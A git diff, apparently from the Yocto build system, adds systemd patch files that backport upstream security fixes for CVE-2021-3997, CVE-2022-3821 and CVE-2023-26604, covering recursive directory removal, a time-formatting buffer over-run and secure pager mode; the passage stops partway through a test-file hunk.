diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch
new file mode 100644
index 0000000000..066e10fbbc
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch
@@ -0,0 +1,101 @@
+Backport of the following upstream commit:
+From bd0127daaaae009ade053718f7d2f297aee4acaf Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 23 Nov 2021 16:56:42 +0100
+Subject: [PATCH 2/3] shared/rm_rf: refactor rm_rf() to shorten code a bit
+
+CVE: CVE-2021-3997
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 53 ++++++++++++++++++++--------------------------
+ 1 file changed, 23 insertions(+), 30 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -159,7 +159,7 @@
+ }
+
+ int rm_rf(const char *path, RemoveFlags flags) {
+- int fd, r;
++ int fd, r, q = 0;
+
+ assert(path);
+
+@@ -191,49 +191,47 @@
+ }
+
+ fd = open(path, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
+- if (fd < 0) {
++ if (fd >= 0) {
++ /* We have a dir */
++ r = rm_rf_children(fd, flags, NULL);
++
++ if (FLAGS_SET(flags, REMOVE_ROOT)) {
++ q = rmdir(path);
++ if (q < 0)
++ q = -errno;
++ }
++ } else {
+ if (FLAGS_SET(flags, REMOVE_MISSING_OK) && errno == ENOENT)
+ return 0;
+
+ if (!IN_SET(errno, ENOTDIR, ELOOP))
+ return -errno;
+
+- if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES))
++ if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES) || !FLAGS_SET(flags, REMOVE_ROOT))
+ return 0;
+
+- if (FLAGS_SET(flags, REMOVE_ROOT)) {
+-
+- if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
+- struct statfs s;
+-
+- if (statfs(path, &s) < 0)
+- return -errno;
+- if (is_physical_fs(&s))
+- return log_error_errno(SYNTHETIC_ERRNO(EPERM),
+- "Attempted to remove files from a disk file system under \"%s\", refusing.",
+- path);
+- }
+-
+- if (unlink(path) < 0) {
+- if (FLAGS_SET(flags, REMOVE_MISSING_OK) && errno == ENOENT)
+- return 0;
++ if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
++ struct statfs s;
+
++ if (statfs(path, &s) < 0)
+ return -errno;
+- }
++ if (is_physical_fs(&s))
++ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
++ "Attempted to remove files from a disk file system under \"%s\", refusing.",
++ path);
+ }
+
+- return 0;
++ r = 0;
++ q = unlink(path);
++ if (q < 0)
++ q = -errno;
+ }
+
+- r = rm_rf_children(fd, flags, NULL);
+-
+- if (FLAGS_SET(flags, REMOVE_ROOT) &&
+- rmdir(path) < 0 &&
+- r >= 0 &&
+- (!FLAGS_SET(flags, REMOVE_MISSING_OK) || errno != ENOENT))
+- r = -errno;
+-
+- return r;
++ if (r < 0)
++ return r;
++ if (q < 0 && (q != -ENOENT || !FLAGS_SET(flags, REMOVE_MISSING_OK)))
++ return q;
++ return 0;
+ }
+
+ int rm_rf_child(int fd, const char *name, RemoveFlags flags) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch
new file mode 100644
index 0000000000..c96b8d9a6e
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch
@@ -0,0 +1,266 @@
+Backport of the following upstream commit:
+From bef8e8e577368697b2e6f85183b1dbc99e0e520f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 30 Nov 2021 22:29:05 +0100
+Subject: [PATCH 3/3] shared/rm-rf: loop over nested directories instead of
+ instead of recursing
+
+To remove directory structures, we need to remove the innermost items first,
+and then recursively remove higher-level directories. We would recursively
+descend into directories and invoke rm_rf_children and rm_rm_children_inner.
+This is problematic when too many directories are nested.
+
+Instead, let's create a "TODO" queue. In the the queue, for each level we
+hold the DIR* object we were working on, and the name of the directory. This
+allows us to leave a partially-processed directory, and restart the removal
+loop one level down. When done with the inner directory, we use the name to
+unlinkat() it from the parent, and proceed with the removal of other items.
+
+Because the nesting is increased by one level, it is best to view this patch
+with -b/--ignore-space-change.
+
+This fixes CVE-2021-3997, https://bugzilla.redhat.com/show_bug.cgi?id=2024639.
+The issue was reported and patches reviewed by Qualys Team.
+Mauro Matteo Cascella and Riccardo Schirone from Red Hat handled the disclosure.
+
+CVE: CVE-2021-3997
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 161 +++++++++++++++++++++++++++++++--------------
+ 1 file changed, 113 insertions(+), 48 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -26,12 +26,13 @@
+ return !is_temporary_fs(sfs) && !is_cgroup_fs(sfs);
+ }
+
+-static int rm_rf_children_inner(
++static int rm_rf_inner_child(
+ int fd,
+ const char *fname,
+ int is_dir,
+ RemoveFlags flags,
+- const struct stat *root_dev) {
++ const struct stat *root_dev,
++ bool allow_recursion) {
+
+ struct stat st;
+ int r, q = 0;
+@@ -49,9 +50,7 @@
+ }
+
+ if (is_dir) {
+- _cleanup_close_ int subdir_fd = -1;
+-
+- /* if root_dev is set, remove subdirectories only if device is same */
++ /* If root_dev is set, remove subdirectories only if device is same */
+ if (root_dev && st.st_dev != root_dev->st_dev)
+ return 0;
+
+@@ -63,7 +62,6 @@
+ return 0;
+
+ if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
+-
+ /* This could be a subvolume, try to remove it */
+
+ r = btrfs_subvol_remove_fd(fd, fname, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
+@@ -77,13 +75,16 @@
+ return 1;
+ }
+
+- subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
++ if (!allow_recursion)
++ return -EISDIR;
++
++ int subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
+ if (subdir_fd < 0)
+ return -errno;
+
+ /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file system type
+ * again for each directory */
+- q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
++ q = rm_rf_children(subdir_fd, flags | REMOVE_PHYSICAL, root_dev);
+
+ } else if (flags & REMOVE_ONLY_DIRECTORIES)
+ return 0;
+@@ -96,64 +97,128 @@
+ return 1;
+ }
+
++typedef struct TodoEntry {
++ DIR *dir; /* A directory that we were operating on. */
++ char *dirname; /* The filename of that directory itself. */
++} TodoEntry;
++
++static void free_todo_entries(TodoEntry **todos) {
++ for (TodoEntry *x = *todos; x && x->dir; x++) {
++ closedir(x->dir);
++ free(x->dirname);
++ }
++
++ freep(todos);
++}
++
+ int rm_rf_children(
+ int fd,
+ RemoveFlags flags,
+ const struct stat *root_dev) {
+
+- _cleanup_closedir_ DIR *d = NULL;
+- struct dirent *de;
++ _cleanup_(free_todo_entries) TodoEntry *todos = NULL;
++ size_t n_todo = 0, allocated = 0;
++ _cleanup_free_ char *dirname = NULL; /* Set when we are recursing and want to delete ourselves */
+ int ret = 0, r;
+
+- assert(fd >= 0);
++ /* Return the first error we run into, but nevertheless try to go on.
++ * The passed fd is closed in all cases, including on failure. */
+
+- /* This returns the first error we run into, but nevertheless tries to go on. This closes the passed
+- * fd, in all cases, including on failure. */
++ for (;;) { /* This loop corresponds to the directory nesting level. */
++ _cleanup_closedir_ DIR *d = NULL;
++ struct dirent *de;
++
++ if (n_todo > 0) {
++ /* We know that we are in recursion here, because n_todo is set.
++ * We need to remove the inner directory we were operating on. */
++ assert(dirname);
++ r = unlinkat(dirfd(todos[n_todo-1].dir), dirname, AT_REMOVEDIR);
++ if (r < 0 && r != -ENOENT && ret == 0)
++ ret = r;
++ dirname = mfree(dirname);
++
++ /* And now let's back out one level up */
++ n_todo --;
++ d = TAKE_PTR(todos[n_todo].dir);
++ dirname = TAKE_PTR(todos[n_todo].dirname);
++
++ assert(d);
++ fd = dirfd(d); /* Retrieve the file descriptor from the DIR object */
++ assert(fd >= 0);
++ } else {
++ next_fd:
++ assert(fd >= 0);
++ d = fdopendir(fd);
++ if (!d) {
++ safe_close(fd);
++ return -errno;
++ }
++ fd = dirfd(d); /* We donated the fd to fdopendir(). Let's make sure we sure we have
++ * the right descriptor even if it were to internally invalidate the
++ * one we passed. */
++
++ if (!(flags & REMOVE_PHYSICAL)) {
++ struct statfs sfs;
++
++ if (fstatfs(fd, &sfs) < 0)
++ return -errno;
++
++ if (is_physical_fs(&sfs)) {
++ /* We refuse to clean physical file systems with this call, unless
++ * explicitly requested. This is extra paranoia just to be sure we
++ * never ever remove non-state data. */
++
++ _cleanup_free_ char *path = NULL;
++
++ (void) fd_get_path(fd, &path);
++ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
++ "Attempted to remove disk file system under \"%s\", and we can't allow that.",
++ strna(path));
++ }
++ }
++ }
+
+- d = fdopendir(fd);
+- if (!d) {
+- safe_close(fd);
+- return -errno;
+- }
++ FOREACH_DIRENT_ALL(de, d, return -errno) {
++ int is_dir;
+
+- if (!(flags & REMOVE_PHYSICAL)) {
+- struct statfs sfs;
++ if (dot_or_dot_dot(de->d_name))
++ continue;
+
+- if (fstatfs(dirfd(d), &sfs) < 0)
+- return -errno;
+- }
++ is_dir = de->d_type == DT_UNKNOWN ? -1 : de->d_type == DT_DIR;
+
+- if (is_physical_fs(&sfs)) {
+- /* We refuse to clean physical file systems with this call, unless explicitly
+- * requested. This is extra paranoia just to be sure we never ever remove non-state
+- * data. */
+-
+- _cleanup_free_ char *path = NULL;
+-
+- (void) fd_get_path(fd, &path);
+- return log_error_errno(SYNTHETIC_ERRNO(EPERM),
+- "Attempted to remove disk file system under \"%s\", and we can't allow that.",
+- strna(path));
+- }
+- }
++ r = rm_rf_inner_child(fd, de->d_name, is_dir, flags, root_dev, false);
++ if (r == -EISDIR) {
++ /* Push the current working state onto the todo list */
+
+- FOREACH_DIRENT_ALL(de, d, return -errno) {
+- int is_dir;
++ if (!GREEDY_REALLOC0(todos, allocated, n_todo + 2))
++ return log_oom();
+
+- if (dot_or_dot_dot(de->d_name))
+- continue;
++ _cleanup_free_ char *newdirname = strdup(de->d_name);
++ if (!newdirname)
++ return log_oom();
+
+- is_dir =
+- de->d_type == DT_UNKNOWN ? -1 :
+- de->d_type == DT_DIR;
+-
+- r = rm_rf_children_inner(dirfd(d), de->d_name, is_dir, flags, root_dev);
+- if (r < 0 && r != -ENOENT && ret == 0)
+- ret = r;
+- }
++ int newfd = openat(fd, de->d_name,
++ O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
++ if (newfd >= 0) {
++ todos[n_todo++] = (TodoEntry) { TAKE_PTR(d), TAKE_PTR(dirname) };
++ fd = newfd;
++ dirname = TAKE_PTR(newdirname);
++
++ goto next_fd;
+
+- if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(dirfd(d)) < 0 && ret >= 0)
+- ret = -errno;
++ } else if (errno != -ENOENT && ret == 0)
++ ret = -errno;
++
++ } else if (r < 0 && r != -ENOENT && ret == 0)
++ ret = r;
++ }
++
++ if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(fd) < 0 && ret >= 0)
++ ret = -errno;
++
++ if (n_todo == 0)
++ break;
++ }
+
+ return ret;
+ }
+@@ -250,5 +315,5 @@
+ if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES|REMOVE_SUBVOLUME))
+ return -EINVAL;
+
+- return rm_rf_children_inner(fd, name, -1, flags, NULL);
++ return rm_rf_inner_child(fd, name, -1, flags, NULL, true);
+ }
diff --git a/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch b/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch
new file mode 100644
index 0000000000..f9c6704cfc
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch
@@ -0,0 +1,47 @@
+From 9102c625a673a3246d7e73d8737f3494446bad4e Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Thu, 7 Jul 2022 18:27:02 +0900
+Subject: [PATCH] time-util: fix buffer-over-run
+
+Fixes #23928.
+
+CVE: CVE-2022-3821
+Upstream-Status: Backport [https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: Both the hunks refreshed to backport
+
+---
+ src/basic/time-util.c | 2 +-
+ src/test/test-time-util.c | 5 +++++
+ 2 files changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/src/basic/time-util.c b/src/basic/time-util.c
+index abbc4ad5cd70..26d59de12348 100644
+--- a/src/basic/time-util.c
++++ b/src/basic/time-util.c
+@@ -514,7 +514,7 @@ char *format_timespan(char *buf, size_t
+ t = b;
+ }
+
+- n = MIN((size_t) k, l);
++ n = MIN((size_t) k, l-1);
+
+ l -= n;
+ p += n;
+diff --git a/src/test/test-time-util.c b/src/test/test-time-util.c
+index e8e4e2a67bb1..58c5fa9be40c 100644
+--- a/src/test/test-time-util.c
++++ b/src/test/test-time-util.c
+@@ -501,6 +501,12 @@ int main(int argc, char *argv[]) {
+ test_format_timespan(1);
+ test_format_timespan(USEC_PER_MSEC);
+ test_format_timespan(USEC_PER_SEC);
++
++ /* See issue #23928. */
++ _cleanup_free_ char *buf;
++ assert_se(buf = new(char, 5));
++ assert_se(buf == format_timespan(buf, 5, 100005, 1000));
++
+ test_timezone_is_valid();
+ test_get_timezones();
+ test_usec_add();
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch
new file mode 100644
index 0000000000..39f9480cf8
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch
@@ -0,0 +1,115 @@
+From 612ebf6c913dd0e4197c44909cb3157f5c51a2f0 Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Mon, 31 Aug 2020 19:37:13 +0200
+Subject: [PATCH] pager: set $LESSSECURE whenver we invoke a pager
+
+Some extra safety when invoked via "sudo". With this we address a
+genuine design flaw of sudo, and we shouldn't need to deal with this.
+But it's still a good idea to disable this surface given how exotic it
+is.
+
+Prompted by #5666
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/612ebf6c913dd0e4197c44909cb3157f5c51a2f0]
+Comments: Hunk not refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ man/less-variables.xml | 9 +++++++++
+ man/systemctl.xml | 1 +
+ man/systemd.xml | 1 +
+ src/shared/pager.c | 23 +++++++++++++++++++++--
+ 4 files changed, 32 insertions(+), 2 deletions(-)
+
+diff --git a/man/less-variables.xml b/man/less-variables.xml
+index 08e513c99f8e..c52511ca8e18 100644
+--- a/man/less-variables.xml
++++ b/man/less-variables.xml
+@@ -64,6 +64,15 @@
+ the invoking terminal is determined to be UTF-8 compatible).</para></listitem>
+ </varlistentry>
+
++ <varlistentry id='lesssecure'>
++ <term><varname>$SYSTEMD_LESSSECURE</varname></term>
++
++ <listitem><para>Takes a boolean argument. Overrides the <varname>$LESSSECURE</varname> environment
++ variable when invoking the pager, which controls the "secure" mode of less (which disables commands
++ such as <literal>|</literal> which allow to easily shell out to external command lines). By default
++ less secure mode is enabled, with this setting it may be disabled.</para></listitem>
++ </varlistentry>
++
+ <varlistentry id='colors'>
+ <term><varname>$SYSTEMD_COLORS</varname></term>
+
+diff --git a/man/systemctl.xml b/man/systemctl.xml
+index 1c5502883700..a3f0c3041a57 100644
+--- a/man/systemctl.xml
++++ b/man/systemctl.xml
+@@ -2240,6 +2240,7 @@ Jan 12 10:46:45 example.com bluetoothd[8900]: gatt-time-server: Input/output err
+ <xi:include href="less-variables.xml" xpointer="pager"/>
+ <xi:include href="less-variables.xml" xpointer="less"/>
+ <xi:include href="less-variables.xml" xpointer="lesscharset"/>
++ <xi:include href="less-variables.xml" xpointer="lesssecure"/>
+ <xi:include href="less-variables.xml" xpointer="colors"/>
+ <xi:include href="less-variables.xml" xpointer="urlify"/>
+ </refsect1>
+diff --git a/man/systemd.xml b/man/systemd.xml
+index a9040545c2ab..c92cfef77689 100644
+--- a/man/systemd.xml
++++ b/man/systemd.xml
+@@ -692,6 +692,7 @@
+ <xi:include href="less-variables.xml" xpointer="pager"/>
+ <xi:include href="less-variables.xml" xpointer="less"/>
+ <xi:include href="less-variables.xml" xpointer="lesscharset"/>
++ <xi:include href="less-variables.xml" xpointer="lesssecure"/>
+ <xi:include href="less-variables.xml" xpointer="colors"/>
+ <xi:include href="less-variables.xml" xpointer="urlify"/>
+
+diff --git a/src/shared/pager.c b/src/shared/pager.c
+index e03be6d23b2d..9c21881241f5 100644
+--- a/src/shared/pager.c
++++ b/src/shared/pager.c
+@@ -9,6 +9,7 @@
+ #include <unistd.h>
+
+ #include "copy.h"
++#include "env-util.h"
+ #include "fd-util.h"
+ #include "fileio.h"
+ #include "io-util.h"
+@@ -152,8 +153,7 @@ int pager_open(PagerFlags flags) {
+ _exit(EXIT_FAILURE);
+ }
+
+- /* Initialize a good charset for less. This is
+- * particularly important if we output UTF-8
++ /* Initialize a good charset for less. This is particularly important if we output UTF-8
+ * characters. */
+ less_charset = getenv("SYSTEMD_LESSCHARSET");
+ if (!less_charset && is_locale_utf8())
+@@ -164,6 +164,25 @@ int pager_open(PagerFlags flags) {
+ _exit(EXIT_FAILURE);
+ }
+
++ /* People might invoke us from sudo, don't needlessly allow less to be a way to shell out
++ * privileged stuff. */
++ r = getenv_bool("SYSTEMD_LESSSECURE");
++ if (r == 0) { /* Remove env var if off */
++ if (unsetenv("LESSSECURE") < 0) {
++ log_error_errno(errno, "Failed to uset environment variable LESSSECURE: %m");
++ _exit(EXIT_FAILURE);
++ }
++ } else {
++ /* Set env var otherwise */
++ if (r < 0)
++ log_warning_errno(r, "Unable to parse $SYSTEMD_LESSSECURE, ignoring: %m");
++
++ if (setenv("LESSSECURE", "1", 1) < 0) {
++ log_error_errno(errno, "Failed to set environment variable LESSSECURE: %m");
++ _exit(EXIT_FAILURE);
++ }
++ }
++
+ if (pager_args) {
+ r = loop_write(exe_name_pipe[1], pager_args[0], strlen(pager_args[0]) + 1, false);
+ if (r < 0) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch
new file mode 100644
index 0000000000..95da7cfad6
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch
@@ -0,0 +1,264 @@
+From 1b5b507cd2d1d7a2b053151abb548475ad9c5c3b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Mon, 12 Oct 2020 18:57:32 +0200
+Subject: [PATCH] test-login: always test sd_pid_get_owner_uid(), modernize
+
+A long time some function only worked when in a session, and the test
+didn't execute them when sd_pid_get_session() failed. Let's always call
+them to increase coverage.
+
+While at it, let's test for ==0 not >=0 where we don't expect the function
+to return anything except 0 or error.
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/1b5b507cd2d1d7a2b053151abb548475ad9c5c3b.patch]
+Comments: Hunk not refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ src/libsystemd/sd-login/test-login.c | 131 ++++++++++++++-------------
+ 1 file changed, 70 insertions(+), 61 deletions(-)
+
+diff --git a/src/libsystemd/sd-login/test-login.c b/src/libsystemd/sd-login/test-login.c
+index c0c77e04714b..0494fc77ba18 100644
+--- a/src/libsystemd/sd-login/test-login.c
++++ b/src/libsystemd/sd-login/test-login.c
+@@ -5,21 +5,22 @@
+ #include "sd-login.h"
+
+ #include "alloc-util.h"
++#include "errno-list.h"
+ #include "fd-util.h"
+ #include "format-util.h"
+ #include "log.h"
+ #include "string-util.h"
+ #include "strv.h"
+ #include "time-util.h"
+-#include "util.h"
++#include "user-util.h"
+
+ static char* format_uids(char **buf, uid_t* uids, int count) {
+- int pos = 0, k, inc;
++ int pos = 0, inc;
+ size_t size = (DECIMAL_STR_MAX(uid_t) + 1) * count + 1;
+
+ assert_se(*buf = malloc(size));
+
+- for (k = 0; k < count; k++) {
++ for (int k = 0; k < count; k++) {
+ sprintf(*buf + pos, "%s"UID_FMT"%n", k > 0 ? " " : "", uids[k], &inc);
+ pos += inc;
+ }
+@@ -30,6 +31,10 @@ static char* format_uids(char **buf, uid_t* uids, int count) {
+ return *buf;
+ }
+
++static const char *e(int r) {
++ return r == 0 ? "OK" : errno_to_name(r);
++}
++
+ static void test_login(void) {
+ _cleanup_close_pair_ int pair[2] = { -1, -1 };
+ _cleanup_free_ char *pp = NULL, *qq = NULL,
+@@ -39,65 +44,71 @@ static void test_login(void) {
+ *seat = NULL, *session = NULL,
+ *unit = NULL, *user_unit = NULL, *slice = NULL;
+ int r;
+- uid_t u, u2;
+- char *t, **seats, **sessions;
++ uid_t u, u2 = UID_INVALID;
++ char *t, **seats = NULL, **sessions = NULL;
+
+ r = sd_pid_get_unit(0, &unit);
+- assert_se(r >= 0 || r == -ENODATA);
+- log_info("sd_pid_get_unit(0, …) → \"%s\"", strna(unit));
++ log_info("sd_pid_get_unit(0, …) → %s / \"%s\"", e(r), strnull(unit));
++ assert_se(IN_SET(r, 0, -ENODATA));
+
+ r = sd_pid_get_user_unit(0, &user_unit);
+- assert_se(r >= 0 || r == -ENODATA);
+- log_info("sd_pid_get_user_unit(0, …) → \"%s\"", strna(user_unit));
++ log_info("sd_pid_get_user_unit(0, …) → %s / \"%s\"", e(r), strnull(user_unit));
++ assert_se(IN_SET(r, 0, -ENODATA));
+
+ r = sd_pid_get_slice(0, &slice);
+- assert_se(r >= 0 || r == -ENODATA);
+- log_info("sd_pid_get_slice(0, …) → \"%s\"", strna(slice));
++ log_info("sd_pid_get_slice(0, …) → %s / \"%s\"", e(r), strnull(slice));
++ assert_se(IN_SET(r, 0, -ENODATA));
++
++ r = sd_pid_get_owner_uid(0, &u2);
++ log_info("sd_pid_get_owner_uid(0, …) → %s / "UID_FMT, e(r), u2);
++ assert_se(IN_SET(r, 0, -ENODATA));
+
+ r = sd_pid_get_session(0, &session);
+- if (r < 0) {
+- log_warning_errno(r, "sd_pid_get_session(0, …): %m");
+- if (r == -ENODATA)
+- log_info("Seems we are not running in a session, skipping some tests.");
+- } else {
+- log_info("sd_pid_get_session(0, …) → \"%s\"", session);
+-
+- assert_se(sd_pid_get_owner_uid(0, &u2) == 0);
+- log_info("sd_pid_get_owner_uid(0, …) → "UID_FMT, u2);
+-
+- assert_se(sd_pid_get_cgroup(0, &cgroup) == 0);
+- log_info("sd_pid_get_cgroup(0, …) → \"%s\"", cgroup);
+-
+- r = sd_uid_get_display(u2, &display_session);
+- assert_se(r >= 0 || r == -ENODATA);
+- log_info("sd_uid_get_display("UID_FMT", …) → \"%s\"",
+- u2, strnull(display_session));
+-
+- assert_se(socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == 0);
+- sd_peer_get_session(pair[0], &pp);
+- sd_peer_get_session(pair[1], &qq);
+- assert_se(streq_ptr(pp, qq));
+-
+- r = sd_uid_get_sessions(u2, false, &sessions);
++ log_info("sd_pid_get_session(0, …) → %s / \"%s\"", e(r), strnull(session));
++
++ r = sd_pid_get_cgroup(0, &cgroup);
++ log_info("sd_pid_get_cgroup(0, …) → %s / \"%s\"", e(r), strnull(cgroup));
++ assert_se(r == 0);
++
++ r = sd_uid_get_display(u2, &display_session);
++ log_info("sd_uid_get_display("UID_FMT", …) → %s / \"%s\"", u2, e(r), strnull(display_session));
++ if (u2 == UID_INVALID)
++ assert_se(r == -EINVAL);
++ else
++ assert_se(IN_SET(r, 0, -ENODATA));
++
++ assert_se(socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == 0);
++ sd_peer_get_session(pair[0], &pp);
++ sd_peer_get_session(pair[1], &qq);
++ assert_se(streq_ptr(pp, qq));
++
++ r = sd_uid_get_sessions(u2, false, &sessions);
++ assert_se(t = strv_join(sessions, " "));
++ log_info("sd_uid_get_sessions("UID_FMT", …) → %s \"%s\"", u2, e(r), t);
++ if (u2 == UID_INVALID)
++ assert_se(r == -EINVAL);
++ else {
+ assert_se(r >= 0);
+ assert_se(r == (int) strv_length(sessions));
+- assert_se(t = strv_join(sessions, " "));
+- strv_free(sessions);
+- log_info("sd_uid_get_sessions("UID_FMT", …) → [%i] \"%s\"", u2, r, t);
+- free(t);
++ }
++ sessions = strv_free(sessions);
++ free(t);
+
+- assert_se(r == sd_uid_get_sessions(u2, false, NULL));
++ assert_se(r == sd_uid_get_sessions(u2, false, NULL));
+
+- r = sd_uid_get_seats(u2, false, &seats);
++ r = sd_uid_get_seats(u2, false, &seats);
++ assert_se(t = strv_join(seats, " "));
++ log_info("sd_uid_get_seats("UID_FMT", …) → %s \"%s\"", u2, e(r), t);
++ if (u2 == UID_INVALID)
++ assert_se(r == -EINVAL);
++ else {
+ assert_se(r >= 0);
+ assert_se(r == (int) strv_length(seats));
+- assert_se(t = strv_join(seats, " "));
+- strv_free(seats);
+- log_info("sd_uid_get_seats("UID_FMT", …) → [%i] \"%s\"", u2, r, t);
+- free(t);
+-
+- assert_se(r == sd_uid_get_seats(u2, false, NULL));
+ }
++ seats = strv_free(seats);
++ free(t);
++
++ assert_se(r == sd_uid_get_seats(u2, false, NULL));
+
+ if (session) {
+ r = sd_session_is_active(session);
+@@ -109,7 +120,7 @@ static void test_login(void) {
+ log_info("sd_session_is_remote(\"%s\") → %s", session, yes_no(r));
+
+ r = sd_session_get_state(session, &state);
+- assert_se(r >= 0);
++ assert_se(r == 0);
+ log_info("sd_session_get_state(\"%s\") → \"%s\"", session, state);
+
+ assert_se(sd_session_get_uid(session, &u) >= 0);
+@@ -123,16 +134,16 @@ static void test_login(void) {
+ log_info("sd_session_get_class(\"%s\") → \"%s\"", session, class);
+
+ r = sd_session_get_display(session, &display);
+- assert_se(r >= 0 || r == -ENODATA);
++ assert_se(IN_SET(r, 0, -ENODATA));
+ log_info("sd_session_get_display(\"%s\") → \"%s\"", session, strna(display));
+
+ r = sd_session_get_remote_user(session, &remote_user);
+- assert_se(r >= 0 || r == -ENODATA);
++ assert_se(IN_SET(r, 0, -ENODATA));
+ log_info("sd_session_get_remote_user(\"%s\") → \"%s\"",
+ session, strna(remote_user));
+
+ r = sd_session_get_remote_host(session, &remote_host);
+- assert_se(r >= 0 || r == -ENODATA);
++ assert_se(IN_SET(r, 0, -ENODATA));
+ log_info("sd_session_get_remote_host(\"%s\") → \"%s\"",
+ session, strna(remote_host));
+
+@@ -161,7 +172,7 @@ static void test_login(void) {
+ assert_se(r == -ENODATA);
+ }
+
+- assert_se(sd_uid_get_state(u, &state2) >= 0);
++ assert_se(sd_uid_get_state(u, &state2) == 0);
+ log_info("sd_uid_get_state("UID_FMT", …) → %s", u, state2);
+ }
+
+@@ -173,11 +184,11 @@ static void test_login(void) {
+ assert_se(sd_uid_is_on_seat(u, 0, seat) > 0);
+
+ r = sd_seat_get_active(seat, &session2, &u2);
+- assert_se(r >= 0);
++ assert_se(r == 0);
+ log_info("sd_seat_get_active(\"%s\", …) → \"%s\", "UID_FMT, seat, session2, u2);
+
+ r = sd_uid_is_on_seat(u, 1, seat);
+- assert_se(r >= 0);
++ assert_se(IN_SET(r, 0, 1));
+ assert_se(!!r == streq(session, session2));
+
+ r = sd_seat_get_sessions(seat, &sessions, &uids, &n);
+@@ -185,8 +196,8 @@ static void test_login(void) {
+ assert_se(r == (int) strv_length(sessions));
+ assert_se(t = strv_join(sessions, " "));
+ strv_free(sessions);
+- log_info("sd_seat_get_sessions(\"%s\", …) → %i, \"%s\", [%i] {%s}",
+- seat, r, t, n, format_uids(&buf, uids, n));
++ log_info("sd_seat_get_sessions(\"%s\", …) → %s, \"%s\", [%u] {%s}",
++ seat, e(r), t, n, format_uids(&buf, uids, n));
+ free(t);
+
+ assert_se(sd_seat_get_sessions(seat, NULL, NULL, NULL) == r);
+@@ -204,7 +215,7 @@ static void test_login(void) {
+
+ r = sd_seat_get_active(NULL, &t, NULL);
+ assert_se(IN_SET(r, 0, -ENODATA));
+- log_info("sd_seat_get_active(NULL, …) (active session on current seat) → %s", strnull(t));
++ log_info("sd_seat_get_active(NULL, …) (active session on current seat) → %s / \"%s\"", e(r), strnull(t));
+ free(t);
+
+ r = sd_get_sessions(&sessions);
+@@ -244,13 +255,11 @@ static void test_login(void) {
+
+ static void test_monitor(void) {
+ sd_login_monitor *m = NULL;
+- unsigned n;
+ int r;
+
+- r = sd_login_monitor_new("session", &m);
